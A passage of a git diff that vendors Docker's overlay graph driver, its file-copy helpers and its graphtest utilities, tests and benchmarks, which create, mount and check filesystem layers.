+	defer drv.Put(layer)
+
+	for i := 0; i < count; i += 100 {
+		dir := path.Join(root, fmt.Sprintf("directory-%d", i))
+		for j := 0; i+j < count && j < 100; j++ {
+			file := path.Join(dir, fmt.Sprintf("file-%d", i+j))
+			fileContent, err := ioutil.ReadFile(file)
+			if err != nil {
+				return err
+			}
+
+			content := randomContent(64, seed+int64(i+j))
+
+			if bytes.Compare(fileContent, content) != 0 {
+				return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content)
+			}
+		}
+	}
+
+	return nil
+}
+
+type changeList []archive.Change
+
+func (c changeList) Less(i, j int) bool {
+	if c[i].Path == c[j].Path {
+		return c[i].Kind < c[j].Kind
+	}
+	return c[i].Path < c[j].Path
+}
+func (c changeList) Len() int      { return len(c) }
+func (c changeList) Swap(i, j int) { c[j], c[i] = c[i], c[j] }
+
+func checkChanges(expected, actual []archive.Change) error {
+	if len(expected) != len(actual) {
+		return fmt.Errorf("unexpected number of changes, expected %d, got %d", len(expected), len(actual))
+	}
+	sort.Sort(changeList(expected))
+	sort.Sort(changeList(actual))
+
+	for i := range expected {
+		if expected[i] != actual[i] {
+			return fmt.Errorf("unexpected change, expecting %v, got %v", expected[i], actual[i])
+		}
+	}
+
+	return nil
+}
+
+func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil {
+		return err
+	}
+	layerDir := path.Join(root, fmt.Sprintf("layer-%d", i))
+	if err := os.MkdirAll(layerDir, 0755); err != nil {
+		return err
+	}
+	if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil {
+		return err
+	}
+	if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) {
+	lastLayer := baseLayer
+	for i := 1; i <= count; i++ {
+		nextLayer := stringid.GenerateRandomID()
+		if err := drv.Create(nextLayer, lastLayer, nil); err != nil {
+			return "", err
+		}
+		if err := addLayerFiles(drv, nextLayer, lastLayer, i); err != nil {
+			return "", err
+		}
+
+		lastLayer = nextLayer
+
+	}
+	return lastLayer, nil
+}
+
+func checkManyLayers(drv graphdriver.Driver, layer string, count int) error {
+	root, err := drv.Get(layer, "")
+	if err != nil {
+		return err
+	}
+	defer drv.Put(layer)
+
+	layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id"))
+	if err != nil {
+		return err
+	}
+
+	if bytes.Compare(layerIDBytes, []byte(layer)) != 0 {
+		return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer))
+	}
+
+	for i := count; i > 0; i-- {
+		layerDir := path.Join(root, fmt.Sprintf("layer-%d", i))
+
+		thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id"))
+		if err != nil {
+			return err
+		}
+		if bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 {
+			return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes)
+		}
+		layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id"))
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// readDir reads a directory just like ioutil.ReadDir()
+// then hides specific files (currently "lost+found")
+// so the tests don't "see" it
+func readDir(dir string) ([]os.FileInfo, error) {
+	a, err := ioutil.ReadDir(dir)
+	if err != nil {
+		return nil, err
+	}
+
+	b := a[:0]
+	for _, x := range a {
+		if x.Name() != "lost+found" { // ext4 always have this dir
+			b = append(b, x)
+		}
+	}
+
+	return b, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
new file mode 100644
index 0000000000..49b0c2cc35
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
@@ -0,0 +1,143 @@
+// +build linux freebsd
+
+package graphtest
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"syscall"
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver"
+)
+
+// InitLoopbacks ensures that the loopback devices are properly created within
+// the system running the device mapper tests.
+func InitLoopbacks() error {
+	statT, err := getBaseLoopStats()
+	if err != nil {
+		return err
+	}
+	// create at least 8 loopback files, ya, that is a good number
+	for i := 0; i < 8; i++ {
+		loopPath := fmt.Sprintf("/dev/loop%d", i)
+		// only create new loopback files if they don't exist
+		if _, err := os.Stat(loopPath); err != nil {
+			if mkerr := syscall.Mknod(loopPath,
+				uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil {
+				return mkerr
+			}
+			os.Chown(loopPath, int(statT.Uid), int(statT.Gid))
+		}
+	}
+	return nil
+}
+
+// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the
+// loop0 device on the system.  If it does not exist we assume 0,0,0660 for the
+// stat data
+func getBaseLoopStats() (*syscall.Stat_t, error) {
+	loop0, err := os.Stat("/dev/loop0")
+	if err != nil {
+		if os.IsNotExist(err) {
+			return &syscall.Stat_t{
+				Uid:  0,
+				Gid:  0,
+				Mode: 0660,
+			}, nil
+		}
+		return nil, err
+	}
+	return loop0.Sys().(*syscall.Stat_t), nil
+}
+
+func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) {
+	fi, err := os.Stat(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if fi.Mode()&os.ModeType != mode&os.ModeType {
+		t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType)
+	}
+
+	if fi.Mode()&os.ModePerm != mode&os.ModePerm {
+		t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm)
+	}
+
+	if fi.Mode()&os.ModeSticky != mode&os.ModeSticky {
+		t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky)
+	}
+
+	if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid {
+		t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid)
+	}
+
+	if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid {
+		t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid)
+	}
+
+	if stat, ok := fi.Sys().(*syscall.Stat_t); ok {
+		if stat.Uid != uid {
+			t.Fatalf("%s no owned by uid %d", path, uid)
+		}
+		if stat.Gid != gid {
+			t.Fatalf("%s not owned by gid %d", path, gid)
+		}
+	}
+}
+
+func createBase(t testing.TB, driver graphdriver.Driver, name string) {
+	// We need to be able to set any perms
+	oldmask := syscall.Umask(0)
+	defer syscall.Umask(oldmask)
+
+	if err := driver.CreateReadWrite(name, "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	dir, err := driver.Get(name, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer driver.Put(name)
+
+	subdir := path.Join(dir, "a subdir")
+	if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Chown(subdir, 1, 2); err != nil {
+		t.Fatal(err)
+	}
+
+	file := path.Join(dir, "a file")
+	if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func verifyBase(t testing.TB, driver graphdriver.Driver, name string) {
+	dir, err := driver.Get(name, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer driver.Put(name)
+
+	subdir := path.Join(dir, "a subdir")
+	verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2)
+
+	file := path.Join(dir, "a file")
+	verifyFile(t, file, 0222|os.ModeSetuid, 0, 0)
+
+	fis, err := readDir(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(fis) != 2 {
+		t.Fatal("Unexpected files in base image")
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
new file mode 100644
index 0000000000..666a5c0e04
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go
@@ -0,0 +1,174 @@
+// +build linux
+
+package overlay
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/system"
+	rsystem "github.com/opencontainers/runc/libcontainer/system"
+)
+
+type copyFlags int
+
+const (
+	copyHardlink copyFlags = 1 << iota
+)
+
+func copyRegular(srcPath, dstPath string, mode os.FileMode) error {
+	srcFile, err := os.Open(srcPath)
+	if err != nil {
+		return err
+	}
+	defer srcFile.Close()
+
+	dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode)
+	if err != nil {
+		return err
+	}
+	defer dstFile.Close()
+
+	_, err = pools.Copy(dstFile, srcFile)
+
+	return err
+}
+
+func copyXattr(srcPath, dstPath, attr string) error {
+	data, err := system.Lgetxattr(srcPath, attr)
+	if err != nil {
+		return err
+	}
+	if data != nil {
+		if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func copyDir(srcDir, dstDir string, flags copyFlags) error {
+	err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+
+		// Rebase path
+		relPath, err := filepath.Rel(srcDir, srcPath)
+		if err != nil {
+			return err
+		}
+
+		dstPath := filepath.Join(dstDir, relPath)
+		if err != nil {
+			return err
+		}
+
+		stat, ok := f.Sys().(*syscall.Stat_t)
+		if !ok {
+			return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath)
+		}
+
+		isHardlink := false
+
+		switch f.Mode() & os.ModeType {
+		case 0: // Regular file
+			if flags&copyHardlink != 0 {
+				isHardlink = true
+				if err := os.Link(srcPath, dstPath); err != nil {
+					return err
+				}
+			} else {
+				if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil {
+					return err
+				}
+			}
+
+		case os.ModeDir:
+			if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) {
+				return err
+			}
+
+		case os.ModeSymlink:
+			link, err := os.Readlink(srcPath)
+			if err != nil {
+				return err
+			}
+
+			if err := os.Symlink(link, dstPath); err != nil {
+				return err
+			}
+
+		case os.ModeNamedPipe:
+			fallthrough
+		case os.ModeSocket:
+			if rsystem.RunningInUserNS() {
+				// cannot create a device if running in user namespace
+				return nil
+			}
+			if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil {
+				return err
+			}
+
+		case os.ModeDevice:
+			if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil {
+				return err
+			}
+
+		default:
+			return fmt.Errorf("Unknown file type for %s\n", srcPath)
+		}
+
+		// Everything below is copying metadata from src to dst. All this metadata
+		// already shares an inode for hardlinks.
+		if isHardlink {
+			return nil
+		}
+
+		if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil {
+			return err
+		}
+
+		if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil {
+			return err
+		}
+
+		// We need to copy this attribute if it appears in an overlay upper layer, as
+		// this function is used to copy those. It is set by overlay if a directory
+		// is removed and then re-created and should not inherit anything from the
+		// same dir in the lower dir.
+		if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil {
+			return err
+		}
+
+		isSymlink := f.Mode()&os.ModeSymlink != 0
+
+		// There is no LChmod, so ignore mode for symlink. Also, this
+		// must happen after chown, as that can modify the file mode
+		if !isSymlink {
+			if err := os.Chmod(dstPath, f.Mode()); err != nil {
+				return err
+			}
+		}
+
+		// system.Chtimes doesn't support a NOFOLLOW flag atm
+		if !isSymlink {
+			aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec))
+			mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec))
+			if err := system.Chtimes(dstPath, aTime, mTime); err != nil {
+				return err
+			}
+		} else {
+			ts := []syscall.Timespec{stat.Atim, stat.Mtim}
+			if err := system.LUtimesNano(dstPath, ts); err != nil {
+				return err
+			}
+		}
+		return nil
+	})
+	return err
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
new file mode 100644
index 0000000000..121b72e2c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go
@@ -0,0 +1,462 @@
+// +build linux
+
+package overlay
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"strconv"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/overlayutils"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/fsutils"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+// This is a small wrapper over the NaiveDiffWriter that lets us have a custom
+// implementation of ApplyDiff()
+
+var (
+	// ErrApplyDiffFallback is returned to indicate that a normal ApplyDiff is applied as a fallback from Naive diff writer.
+	ErrApplyDiffFallback = fmt.Errorf("Fall back to normal ApplyDiff")
+	backingFs            = "<unknown>"
+)
+
+// ApplyDiffProtoDriver wraps the ProtoDriver by extending the interface with ApplyDiff method.
+type ApplyDiffProtoDriver interface {
+	graphdriver.ProtoDriver
+	// ApplyDiff writes the diff to the archive for the given id and parent id.
+	// It returns the size in bytes written if successful, an error ErrApplyDiffFallback is returned otherwise.
+	ApplyDiff(id, parent string, diff io.Reader) (size int64, err error)
+}
+
+type naiveDiffDriverWithApply struct {
+	graphdriver.Driver
+	applyDiff ApplyDiffProtoDriver
+}
+
+// NaiveDiffDriverWithApply returns a NaiveDiff driver with custom ApplyDiff.
+func NaiveDiffDriverWithApply(driver ApplyDiffProtoDriver, uidMaps, gidMaps []idtools.IDMap) graphdriver.Driver {
+	return &naiveDiffDriverWithApply{
+		Driver:    graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps),
+		applyDiff: driver,
+	}
+}
+
+// ApplyDiff creates a diff layer with either the NaiveDiffDriver or with a fallback.
+func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader) (int64, error) {
+	b, err := d.applyDiff.ApplyDiff(id, parent, diff)
+	if err == ErrApplyDiffFallback {
+		return d.Driver.ApplyDiff(id, parent, diff)
+	}
+	return b, err
+}
+
+// This backend uses the overlay union filesystem for containers
+// plus hard link file sharing for images.
+
+// Each container/image can have a "root" subdirectory which is a plain
+// filesystem hierarchy, or they can use overlay.
+
+// If they use overlay there is a "upper" directory and a "lower-id"
+// file, as well as "merged" and "work" directories. The "upper"
+// directory has the upper layer of the overlay, and "lower-id" contains
+// the id of the parent whose "root" directory shall be used as the lower
+// layer in the overlay. The overlay itself is mounted in the "merged"
+// directory, and the "work" dir is needed for overlay to work.
+
+// When an overlay layer is created there are two cases, either the
+// parent has a "root" dir, then we start out with an empty "upper"
+// directory overlaid on the parents root. This is typically the
+// case with the init layer of a container which is based on an image.
+// If there is no "root" in the parent, we inherit the lower-id from
+// the parent and start by making a copy in the parent's "upper" dir.
+// This is typically the case for a container layer which copies
+// its parent -init upper layer.
+
+// Additionally we also have a custom implementation of ApplyLayer
+// which makes a recursive copy of the parent "root" layer using
+// hardlinks to share file data, and then applies the layer on top
+// of that. This means all child images share file (but not directory)
+// data with the parent.
+
+// Driver contains information about the home directory and the list of active mounts that are created using this driver.
+type Driver struct {
+	home          string
+	uidMaps       []idtools.IDMap
+	gidMaps       []idtools.IDMap
+	ctr           *graphdriver.RefCounter
+	supportsDType bool
+}
+
+func init() {
+	graphdriver.Register("overlay", Init)
+}
+
+// Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem.
+// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error.
+// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned.
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+
+	if err := supportsOverlay(); err != nil {
+		return nil, graphdriver.ErrNotSupported
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(home)
+	if err != nil {
+		return nil, err
+	}
+	if fsName, ok := graphdriver.FsNames[fsMagic]; ok {
+		backingFs = fsName
+	}
+
+	switch fsMagic {
+	case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs:
+		logrus.Errorf("'overlay' is not supported over %s", backingFs)
+		return nil, graphdriver.ErrIncompatibleFS
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	// Create the driver home dir
+	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
+		return nil, err
+	}
+
+	if err := mount.MakePrivate(home); err != nil {
+		return nil, err
+	}
+
+	supportsDType, err := fsutils.SupportsDType(home)
+	if err != nil {
+		return nil, err
+	}
+	if !supportsDType {
+		// not a fatal error until v1.16 (#27443)
+		logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs))
+	}
+
+	d := &Driver{
+		home:          home,
+		uidMaps:       uidMaps,
+		gidMaps:       gidMaps,
+		ctr:           graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)),
+		supportsDType: supportsDType,
+	}
+
+	return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil
+}
+
+func supportsOverlay() error {
+	// We can try to modprobe overlay first before looking at
+	// proc/filesystems for when overlay is supported
+	exec.Command("modprobe", "overlay").Run()
+
+	f, err := os.Open("/proc/filesystems")
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	s := bufio.NewScanner(f)
+	for s.Scan() {
+		if s.Text() == "nodev\toverlay" {
+			return nil
+		}
+	}
+	logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.")
+	return graphdriver.ErrNotSupported
+}
+
+func (d *Driver) String() string {
+	return "overlay"
+}
+
+// Status returns current driver information in a two dimensional string array.
+// Output contains "Backing Filesystem" used in this implementation.
+func (d *Driver) Status() [][2]string {
+	return [][2]string{
+		{"Backing Filesystem", backingFs},
+		{"Supports d_type", strconv.FormatBool(d.supportsDType)},
+	}
+}
+
+// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	dir := d.dir(id)
+	if _, err := os.Stat(dir); err != nil {
+		return nil, err
+	}
+
+	metadata := make(map[string]string)
+
+	// If id has a root, it is an image
+	rootDir := path.Join(dir, "root")
+	if _, err := os.Stat(rootDir); err == nil {
+		metadata["RootDir"] = rootDir
+		return metadata, nil
+	}
+
+	lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id"))
+	if err != nil {
+		return nil, err
+	}
+
+	metadata["LowerDir"] = path.Join(d.dir(string(lowerID)), "root")
+	metadata["UpperDir"] = path.Join(dir, "upper")
+	metadata["WorkDir"] = path.Join(dir, "work")
+	metadata["MergedDir"] = path.Join(dir, "merged")
+
+	return metadata, nil
+}
+
+// Cleanup any state created by overlay which should be cleaned when daemon
+// is being shutdown. For now, we just have to unmount the bind mounted
+// we had created.
+func (d *Driver) Cleanup() error {
+	return mount.Unmount(d.home)
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id.
+// The parent filesystem is used to configure these directories for the overlay.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) {
+
+	if opts != nil && len(opts.StorageOpt) != 0 {
+		return fmt.Errorf("--storage-opt is not supported for overlay")
+	}
+
+	dir := d.dir(id)
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return err
+	}
+	if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	defer func() {
+		// Clean up on failure
+		if retErr != nil {
+			os.RemoveAll(dir)
+		}
+	}()
+
+	// Toplevel images are just a "root" dir
+	if parent == "" {
+		if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil {
+			return err
+		}
+		return nil
+	}
+
+	parentDir := d.dir(parent)
+
+	// Ensure parent exists
+	if _, err := os.Lstat(parentDir); err != nil {
+		return err
+	}
+
+	// If parent has a root, just do an overlay to it
+	parentRoot := path.Join(parentDir, "root")
+
+	if s, err := os.Lstat(parentRoot); err == nil {
+		if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil {
+			return err
+		}
+		if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
+			return err
+		}
+		if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+			return err
+		}
+		if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil {
+			return err
+		}
+		return nil
+	}
+
+	// Otherwise, copy the upper and the lower-id from the parent
+
+	lowerID, err := ioutil.ReadFile(path.Join(parentDir, "lower-id"))
+	if err != nil {
+		return err
+	}
+
+	if err := ioutil.WriteFile(path.Join(dir, "lower-id"), lowerID, 0666); err != nil {
+		return err
+	}
+
+	parentUpperDir := path.Join(parentDir, "upper")
+	s, err := os.Lstat(parentUpperDir)
+	if err != nil {
+		return err
+	}
+
+	upperDir := path.Join(dir, "upper")
+	if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	return copyDir(parentUpperDir, upperDir, 0)
+}
+
+func (d *Driver) dir(id string) string {
+	return path.Join(d.home, id)
+}
+
+// Remove cleans the directories that are created for this id.
+func (d *Driver) Remove(id string) error {
+	if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	return nil
+}
+
+// Get creates and mounts the required file system for the given id and returns the mount path.
+func (d *Driver) Get(id string, mountLabel string) (s string, err error) {
+	dir := d.dir(id)
+	if _, err := os.Stat(dir); err != nil {
+		return "", err
+	}
+	// If id has a root, just return it
+	rootDir := path.Join(dir, "root")
+	if _, err := os.Stat(rootDir); err == nil {
+		return rootDir, nil
+	}
+	mergedDir := path.Join(dir, "merged")
+	if count := d.ctr.Increment(mergedDir); count > 1 {
+		return mergedDir, nil
+	}
+	defer func() {
+		if err != nil {
+			if c := d.ctr.Decrement(mergedDir); c <= 0 {
+				syscall.Unmount(mergedDir, 0)
+			}
+		}
+	}()
+	lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id"))
+	if err != nil {
+		return "", err
+	}
+	var (
+		lowerDir = path.Join(d.dir(string(lowerID)), "root")
+		upperDir = path.Join(dir, "upper")
+		workDir  = path.Join(dir, "work")
+		opts     = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir)
+	)
+	if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil {
+		return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err)
+	}
+	// chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a
+	// user namespace requires this to move a directory from lower to upper.
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return "", err
+	}
+	if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil {
+		return "", err
+	}
+	return mergedDir, nil
+}
+
+// Put unmounts the mount path created for the give id.
+func (d *Driver) Put(id string) error {
+	// If id has a root, just return
+	if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil {
+		return nil
+	}
+	mountpoint := path.Join(d.dir(id), "merged")
+	if count := d.ctr.Decrement(mountpoint); count > 0 {
+		return nil
+	}
+	if err := syscall.Unmount(mountpoint, 0); err != nil {
+		logrus.Debugf("Failed to unmount %s overlay: %v", id, err)
+	}
+	return nil
+}
+
+// ApplyDiff applies the new layer on top of the root, if parent does not exist with will return an ErrApplyDiffFallback error.
+func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) {
+	dir := d.dir(id)
+
+	if parent == "" {
+		return 0, ErrApplyDiffFallback
+	}
+
+	parentRootDir := path.Join(d.dir(parent), "root")
+	if _, err := os.Stat(parentRootDir); err != nil {
+		return 0, ErrApplyDiffFallback
+	}
+
+	// We now know there is a parent, and it has a "root" directory containing
+	// the full root filesystem. We can just hardlink it and apply the
+	// layer. This relies on two things:
+	// 1) ApplyDiff is only run once on a clean (no writes to upper layer) container
+	// 2) ApplyDiff doesn't do any in-place writes to files (would break hardlinks)
+	// These are all currently true and are not expected to break
+
+	tmpRootDir, err := ioutil.TempDir(dir, "tmproot")
+	if err != nil {
+		return 0, err
+	}
+	defer func() {
+		if err != nil {
+			os.RemoveAll(tmpRootDir)
+		} else {
+			os.RemoveAll(path.Join(dir, "upper"))
+			os.RemoveAll(path.Join(dir, "work"))
+			os.RemoveAll(path.Join(dir, "merged"))
+			os.RemoveAll(path.Join(dir, "lower-id"))
+		}
+	}()
+
+	if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil {
+		return 0, err
+	}
+
+	options := &archive.TarOptions{UIDMaps: d.uidMaps, GIDMaps: d.gidMaps}
+	if size, err = graphdriver.ApplyUncompressedLayer(tmpRootDir, diff, options); err != nil {
+		return 0, err
+	}
+
+	rootDir := path.Join(dir, "root")
+	if err := os.Rename(tmpRootDir, rootDir); err != nil {
+		return 0, err
+	}
+
+	return
+}
+
+// Exists checks to see if the id is already mounted.
+func (d *Driver) Exists(id string) bool {
+	_, err := os.Stat(d.dir(id))
+	return err == nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
new file mode 100644
index 0000000000..34b6d801fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go
@@ -0,0 +1,93 @@
+// +build linux
+
+package overlay
+
+import (
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+	"github.com/docker/docker/pkg/archive"
+)
+
+func init() {
+	// Do not sure chroot to speed run time and allow archive
+	// errors or hangs to be debugged directly from the test process.
+	graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer
+}
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown
+func TestOverlaySetup(t *testing.T) {
+	graphtest.GetDriver(t, "overlay")
+}
+
+func TestOverlayCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, "overlay")
+}
+
+func TestOverlayCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, "overlay")
+}
+
+func TestOverlayCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, "overlay")
+}
+
+func TestOverlay50LayerRead(t *testing.T) {
+	graphtest.DriverTestDeepLayerRead(t, 50, "overlay")
+}
+
+// Fails due to bug in calculating changes after apply
+// likely related to https://github.com/docker/docker/issues/21555
+func TestOverlayDiffApply10Files(t *testing.T) {
+	t.Skipf("Fails to compute changes after apply intermittently")
+	graphtest.DriverTestDiffApply(t, 10, "overlay")
+}
+
+func TestOverlayChanges(t *testing.T) {
+	t.Skipf("Fails to compute changes intermittently")
+	graphtest.DriverTestChanges(t, "overlay")
+}
+
+func TestOverlayTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
+
+// Benchmarks should always setup new driver
+
+func BenchmarkExists(b *testing.B) {
+	graphtest.DriverBenchExists(b, "overlay")
+}
+
+func BenchmarkGetEmpty(b *testing.B) {
+	graphtest.DriverBenchGetEmpty(b, "overlay")
+}
+
+func BenchmarkDiffBase(b *testing.B) {
+	graphtest.DriverBenchDiffBase(b, "overlay")
+}
+
+func BenchmarkDiffSmallUpper(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10, 10, "overlay")
+}
+
+func BenchmarkDiff10KFileUpper(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10, 10000, "overlay")
+}
+
+func BenchmarkDiff10KFilesBottom(b *testing.B) {
+	graphtest.DriverBenchDiffN(b, 10000, 10, "overlay")
+}
+
+func BenchmarkDiffApply100(b *testing.B) {
+	graphtest.DriverBenchDiffApplyN(b, 100, "overlay")
+}
+
+func BenchmarkDiff20Layers(b *testing.B) {
+	graphtest.DriverBenchDeepLayerDiff(b, 20, "overlay")
+}
